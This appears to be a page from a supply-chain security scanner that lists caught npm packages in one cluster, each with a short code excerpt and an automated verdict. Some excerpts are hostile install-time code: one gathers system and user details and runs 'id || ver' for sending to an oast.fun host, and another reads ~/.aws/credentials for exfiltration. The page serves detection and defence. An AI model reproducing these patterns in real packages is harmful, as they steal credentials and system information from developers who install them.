This list shows every caught package that currently matches this cluster's axis, replayed live over the last 7 days. Each snippet shows where the cluster identifier appears in the package's static excerpt, or which takeover heuristic fired.
const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.st
llm: Sends to suspicious destination: wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.
const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.st
llm: Sends to suspicious destination: wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.
import Conf from 'conf'; import axios from 'axios';
llm: No suspicious destination, no remote-exec shape — 1 other host(s).
let imports = {}; imports['__wbindgen_placeholder__'] = module.exports; let wasm; const { TextDecoder, TextEncoder } = require(`util`);
llm: No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
try{data+=fs.readFileSync(home+'/.aws/credentials','utf8')}catch(e){}
llm: Credential read (reads-aws-creds, reads-npmrc) paired with http-to-public-ip destination — classic exfiltration signature.